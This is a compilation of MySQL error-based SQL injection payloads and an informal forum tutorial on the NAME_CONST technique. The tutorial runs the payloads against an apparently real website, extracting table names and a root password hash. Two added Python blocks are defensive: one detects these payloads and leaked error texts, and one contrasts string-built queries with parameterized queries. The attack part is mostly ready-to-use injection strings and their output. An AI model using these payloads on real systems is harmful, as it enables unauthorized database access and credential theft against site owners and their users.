1. Error-based injection via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:

First, run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement forces an error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is revealed in the error message. To retrieve other data, replace the version() expression with the desired subquery. For example, to retrieve the administrator user name and password:

Method1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:
and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
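A defender-side check for the three primitives above, added here as an example and not code from the post: it URL-decodes each request's query string and flags the floor(rand(0)*2), extractvalue(), updatexml() and name_const() markers, and separately flags responses that echo the MySQL error texts shown on this page, since the data only leaks because the application forwards the database error to the client. The host app.example, the log entries and the response bodies are constructed for the example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Markers of the MySQL error-based primitives discussed on this page, matched
# case-insensitively against the URL-decoded query string. Whitespace inside the
# function calls is tolerated so that spacing variants are still caught.
REQUEST_PATTERNS = {
    "floor_rand": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", re.I),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    "name_const": re.compile(r"\bname_const\s*\(", re.I),
}

# MySQL error texts that show the application forwards database errors to the
# client; responses carrying them are flagged even when the request looks clean.
RESPONSE_PATTERNS = [re.compile(p, re.I) for p in (
    r"duplicate entry '.*' for key '",   # ERROR 1062, floor()/GROUP BY technique
    r"duplicate column name '",          # ERROR 1060, name_const technique
    r"xpath syntax error:",              # ERROR 1105, extractvalue()/updatexml()
)]


def decoded_query(url):
    """URL-decode the query string once, treating '+' as a space as the payloads do."""
    return unquote_plus(urlsplit(url).query)


def request_techniques(url):
    """Names of the error-based primitives present in the request, sorted for stable output."""
    q = decoded_query(url)
    return sorted(name for name, rx in REQUEST_PATTERNS.items() if rx.search(q))


def response_leaks_db_error(body):
    """True when the response body echoes one of the MySQL error texts above."""
    return any(rx.search(body) for rx in RESPONSE_PATTERNS)


def scan(entries):
    """entries: iterable of (request_url, response_body). Returns one finding per suspicious pair."""
    findings = []
    for url, body in entries:
        techniques = request_techniques(url)
        leak = response_leaks_db_error(body)
        if techniques or leak:
            findings.append({"url": url, "techniques": techniques, "error_leak": leak})
    return findings


# Constructed sample log: a benign request, then the payload shapes shown on this
# page paired with the error text each produced, and finally a leaked error from
# a request with no injection marker (the leak itself is the finding).
SAMPLE_LOG = [
    ("http://app.example/qcwh/content/detail.php?id=330&sid=19&cid=261",
     "<html>article 330</html>"),
    ("http://app.example/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+"
     "(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--",
     "Error Duplicate column name '5.0.27-community-nt'"),
    ("http://app.example/qcwh/content/detail.php?id=1%20and%20extractvalue(1,%20concat(0x5c,"
     "(select%20pass%20from%20admin%20limit%201)))",
     "ERROR 1105 (HY000): XPATH syntax error: '\\admin888'"),
    ("http://app.example/qcwh/content/detail.php?id=1+and+(select+1+from+(select+count(*),"
     "concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)",
     "ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'"),
    ("http://app.example/qcwh/content/detail.php?id=abc",
     "Duplicate entry 'abc' for key 'PRIMARY'"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["techniques"] or ["-"], "leak" if f["error_leak"] else "", f["url"])
```

The request-side patterns catch the probe before any data comes back; the response-side patterns are the higher-value signal for a defender, because a leaked "Duplicate entry" or "XPATH syntax error" string in an HTTP response means the error channel these techniques rely on is open, whatever the request looked like.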
More collected examples:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection technique for newer MySQL versions: injection using NAME_CONST
It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error Duplicate column name '1'

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
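Every technique on this page needs two things from the application: the id parameter spliced into the SQL text, and the database error echoed back to the browser. As an added example (not code from the tutorial or from the target site), the following Python uses the standard-library sqlite3 module with a constructed in-memory copy of the article table from section 1 to contrast the string-built query with a parameterized one, and to show a handler that keeps the full database error in the server log while the client only gets a generic message.

```python
import logging
import sqlite3

log = logging.getLogger("app")


def make_db():
    """Constructed in-memory article table mirroring the one in section 1 (not the page's schema)."""
    con = sqlite3.connect(":memory:")
    con.execute("create table article (id integer primary key, title text, content text)")
    con.execute("insert into article values (1, 'test', 'do it')")
    return con


def fetch_article_vulnerable(con, raw_id):
    """The pattern the page exploits: the request parameter is spliced into the SQL text."""
    return con.execute("select * from article where id = " + raw_id).fetchall()


def fetch_article_safe(con, raw_id):
    """Hardened form: the value is bound as a parameter and can never become SQL syntax."""
    return con.execute("select * from article where id = ?", (raw_id,)).fetchall()


def error_exposed_by_vulnerable(con, raw_id):
    """Return the database error text the vulnerable query would hand to the client, or None."""
    try:
        fetch_article_vulnerable(con, raw_id)
    except sqlite3.Error as exc:
        return str(exc)
    return None


def handle_request(con, raw_id):
    """Handler shape that closes the error channel: full detail goes to the server log,
    the client sees only a generic message and status code."""
    try:
        rows = fetch_article_safe(con, raw_id)
    except sqlite3.Error as exc:
        log.error("database error for id=%r: %s", raw_id, exc)
        return {"status": 500, "body": "internal error"}
    if not rows:
        return {"status": 404, "body": "not found"}
    return {"status": 200, "body": rows}


# Constructed probe in the shape of the page's payloads: it is only parsed as SQL
# when the parameter is spliced into the statement, and it then forces a database error.
PROBE = "1 and 1=(select 1 from no_such_table)"

if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", error_exposed_by_vulnerable(con, PROBE))   # error text the client would see
    print("parameterized:", handle_request(con, PROBE))            # treated as data: 404, no error text
    print("normal:", handle_request(con, "1"))
```

With the bound parameter the probe string is compared against the integer id column as data and simply matches nothing; with the spliced string it becomes part of the statement and the resulting error message is exactly the kind of output the page's floor(), extractvalue(), updatexml() and name_const() payloads read their data from.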